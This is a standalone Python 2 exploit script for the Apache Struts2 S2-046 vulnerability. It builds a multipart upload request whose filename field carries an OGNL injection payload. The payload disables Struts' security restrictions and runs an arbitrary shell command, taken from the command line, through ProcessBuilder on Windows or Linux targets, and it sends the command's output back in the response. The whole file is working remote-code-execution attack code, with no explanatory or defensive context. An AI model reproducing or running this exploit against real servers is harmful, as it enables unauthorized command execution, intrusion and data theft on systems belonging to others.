#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author by lmx

import requests
import sys
import os

#os.environ["http_proxy"] = "http://127.0.0.1:8080"
#os.environ["https_proxy"] = "https://127.0.0.1:8080"


def exploit(url, cmd):
    boundary = "------WebKitFormBoundaryA2CGwp1IsuRmuBbG"  
    content_type = "multipart/form-data; boundary=%s" % boundary
    payload = "--%s\r\n" % boundary
    payload += "Content-Disposition: form-data; name=\"upload\"; filename=\""
    payload += "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}0\x00b\"\r\n"
    payload += "Content-Type: application/octet-stream\r\n\r\n\r\n--%s--\r\n\r\n" % boundary
               

    header = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36',
    'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryA2CGwp1IsuRmuBbG',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
    }

    exp = payload
    response = requests.post(url, data=exp, headers=header)
    print response.text


if __name__ == '__main__':

    if len(sys.argv) != 3:
        print "Usage : python s2-046-exp.py url command "
    else:
        print " "
    exploit(sys.argv[1], sys.argv[2])
